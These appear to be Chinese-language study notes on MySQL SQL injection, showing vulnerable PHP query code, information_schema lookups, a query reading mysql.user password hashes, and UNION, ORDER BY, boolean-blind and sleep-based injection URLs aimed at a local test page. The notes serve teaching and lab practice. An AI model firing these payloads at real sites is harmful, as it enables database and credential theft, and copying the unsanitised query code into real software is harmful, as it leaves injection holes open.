SQL注入分类
数字型注入
1
2$id = $_GET['id'];
$sql = "select * from users where id=$id LIMIT 0, 1";字符型注入
1
2$id = $_GET['id'];
$sql = "select * from users where id='$id' LIMIT 0, 1";
MYSQL 注入
information_schema数据库
(1) SCEHMATA 存放所有数据库信息。
1
show databases; # 等同于 select * from information_schema.SCHEMATA;
(2) TABLES 存放数据库中表的信息。
1
select table_schema, table_name from information_schema.tables where table_schema='mysql';
(3) COLUMNS 存放表中关于列的信息。
1
select table_name, column_name from information_schema.columns where table_schema='mysql';
(4) user
1
select host, user, authentication_string from mysql.user;
UNION——联合查询
1
2select id, username from test1 union select 1, 2;
select id, username from test1 union select id, username from test2;ORDER BY
1
2select * from test1 order by username;
select * from test1 order by 2; # 从1开始判断列数
知道列数后才能正确使用联合注入。
1
select * from test1 where id=$id;
注入:
1
http://localhost/test.php?id=1+order+by+4
MYSQL 布尔盲注
基础函数
(1) substring(字符串, start, len) 获取子字符串,start从1开始
(2) ascii(字符) 获取字符的ascii编码
(3) length(字符串) 获取字符串长度
示例
(1) 获取数据库长度
1
http://localhost/test.php?id=1 and (select length(database()))>5
(2) 获取当前数据库名
1
http://localhost/test.php?id=1 and (select ascii(substring(database(), 1, 1)))>108
(3) 获取当前表名
1
http://localhost/test.php?id=1 and ascii(substring((select table_name from information_schema.tables where table_schema='test1' limit 0, 1), 1, 1))>100
(4) 获取username
1
http://localhost/test.php?id=1 and ascii(substring((select username from test1 limit 0, 1), 1, 1))>100
MYSQL SLEEP注入
sleep函数
sleep(N) 休眠N秒if 函数
if(expression, T, F) 判断表达式expression真假,为真则返回值T,否则返回值Fsleep注入
1
http://localhost/test.php?id=1 and sleep(if(ascii(substring(database(), 1, 1))>100, 5, 0));